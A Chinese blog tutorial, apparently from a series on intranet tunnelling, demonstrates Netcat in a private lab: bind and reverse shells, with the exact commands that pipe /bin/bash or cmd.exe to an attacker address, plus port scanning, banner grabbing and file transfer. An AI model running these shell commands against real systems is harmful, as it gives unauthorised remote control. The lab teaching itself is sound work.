内网隧道代理技术(五)之 Netcat反弹Shell

Netcat反弹Shell

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下:

参数作用
-c指定连接后要执行的shell命令
-e指定连接后要执行的文件名
-k配置 Socket一直存活(若不想退出 Shell后使监听断开可使用此参数)
-l监听模式
-p设置本地主机使用的通信端口
-u使用UDP传输协议,默认为TCP
-v显示指令执行过程,用-vv会更详细

一、正向反弹Shell

实验拓扑

在这里插入图片描述

机器名称IP
攻击机器192.168.41.20
服务器192.168.41.130

实验介绍

攻击者机器192.168.41.20 和服务器 192.168.41.130 可以相互的访问,这个时候可以使用正向shell

实验复现

1)在服务器上运行:

#windows机器
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe 
#linux机器
nc -lvvp 1111 -e /bin/bash 

在这里插入图片描述

2)在攻击机上运行

nc64.exe 192.168.41.130 1111

在这里插入图片描述

3)拿到正向的shell

在这里插入图片描述

二、反向反弹Shell

实验拓扑

在这里插入图片描述

机器名称IP
攻击机器192.168.41.20
服务器192.168.41.130

实验介绍

攻击者机器 192.168.41.20 不能直接访问服务器,但是服务器 192.168.41.130 可以访问攻击者的机器,这个时候可以使用反向shell

实验复现

1)在攻击者机器运行

#监听1111端口
nc64.exe -lvvp 1111 

在这里插入图片描述

2)在服务器上运行 (反弹到攻击机)

#windos机器
nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111 
#linux机器
nc -e /bin/bash 192.168.41.20 1111

在这里插入图片描述

3)攻击机拿到反向的shell

在这里插入图片描述

三、 Netcat的其他用法

Banner 的抓取

靶机运行着ssh服务,可以查看服务的版本

nc64.exe -nv IP Port

在这里插入图片描述

端口探测

可以查看端口的开放情况,可以看到我们目标服务器的80端口没有开放

nc64.exe -v IP Port

在这里插入图片描述

多端口扫描

可以查看多端口是否开放和允许的服务

nc -v -z IP Port[1]-Port[65535]

在这里插入图片描述

端口监听

监听端口,当访问该端口会输出该信息

nc64.exe -l -p Port

在这里插入图片描述

文件传输

机器IP
接受端192.168.41.132
发送端192.168.41.20

接收端文件夹下为空

在这里插入图片描述
接收端执行命令

nc -lp Port > file

在这里插入图片描述
发送端执行命令

nc -vn IP Port < file -w 1 

在这里插入图片描述

接收端接收到文件

在这里插入图片描述

简易聊天

攻击机执行

nc -l -p Port

在这里插入图片描述

服务器执行

nc64.exe -vn IP Port

在这里插入图片描述

攻击机收到聊天

在这里插入图片描述

posted @ 2023-06-24 18:35  私ははいしゃ敗者です  阅读(86)  评论(0编辑  收藏  举报  来源